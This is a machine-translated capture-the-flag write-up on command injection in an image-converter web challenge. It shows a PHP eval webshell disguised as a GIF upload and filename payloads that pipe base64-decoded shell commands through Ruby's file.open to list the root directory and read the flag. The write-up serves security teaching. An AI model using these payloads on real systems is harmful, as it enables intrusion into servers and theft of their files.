Fifth, space intelligent security ⼤ The real title of the competition ----------PNG chart ⽚ converter

The problem solving steps ：

Don't talk much , See the attachment of the title , Lower him , Use Notepad to open and find the source code of the web page , The same as usual , To examine ！

After the code audit, we can see , File pair … / Sign into ⾏ Filtered , So we can't upload directly

stay convert Can be found in file.open Loopholes can benefit ⽤.

First of all, let's understand the meaning of this sentence upload file /png Format , return base64 Encrypted file name

 "var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"

Let's upload one at will .png file , The content is one sentence , In case of success ？

GIF89a
<?php phpinfo(); @eval($_POST['123']); ?>

Click on upload Show upload success

We can see that the file name has been modified , Next, let's convert the contents of the file , Click on convert

Enter the file name modified above , Click on submit

It is not difficult to find that the contents of our documents have been base64 It's encrypted

Then we can't upload a sentence directly to the Trojan horse , But now that it has read the file , Even though we did base64 encryption , We can also directly put us shell Just put the command in and decrypt it

But the above has been filtered through code audit … / Symbol , So here we use `` The quotes and || Pipe symbol to do what we want , Here we first introduce the functions of backquotes and pipe characters

The quotation marks ：

You can also use shell Special characters for .Shell To get the result of the command in backquotes , It actually executes the command specified in the backquote . Execution time , Special characters in commands , Such as $,”,? And so on will have special meanings , And what the backquotes contain can be any legal Shell command

$ ls
note readme.txt Notice Unix.dir
$ TestString="`echo $HOME ` ` ls [nN]*`"
$ echo $TestString
/home/yxz note Notice

Reference link ：https://blog.csdn.net/weixin_40240670/article/details/86694724

Pipe, ：

The output of one command can be used as the input of another through the pipeline .

“|” Is the pipeline command operator , Abbreviation: pipe symbol . utilize Linux The supplied pipeline symbol “|” Separate the two commands , The output of the command to the left of the pipe will be used as the input to the command on the right of the pipe . Continuous use of pipes means that the output of the first command will be as The input of the second command , The output of the second command is used as the input of the third command , And so on

Use bp Grab the bag , Use the file name just uploaded , Click on sumbit

We can see the transformation diagram below ⽚ My bag , To repeater

So let's start here , The source file uses base64 encryption , Then let's use the back quotation marks inside the back quotation marks shell Command execution , Then use the pipe symbol to decrypt the converted file

Here we use ls / To view the files in its root directory , To carry out an order base64 encryption , Add base64 Decryption instructions , take shell Command output to the uploaded image file .

Report errors , Re examination found that there was one less pipe symbol ...... again send

file=|`echo bHMgLw== | base64 -d`>4755211f043684058811cb50d9ddb4df.png

render There seems to be nothing in it , Enter the page to see

See a string of base64 Encrypted content , Explain ！ Use hackbar

Choose base64 decode, Decrypt the above content to see its root directory , There is one flag_9707 file

Now that I know flag Location , Then let's go directly cat Command input , Old method , Yes cat /flag_9707 Conduct base64 encryption , Add base64 Decryption instructions , take shell Command output flag Content to the uploaded image file

file=|`echo Y2F0IC9mbGFnXzk3MDc= | base64 -d`>4755211f043684058811cb50d9ddb4df.png

Click on send No report error , Enter the page to view

Decrypt the following content to get flag

ctfhub{4d99ffb30443051a909a2e0d}

There are many deficiencies in the article , Please spray gently ....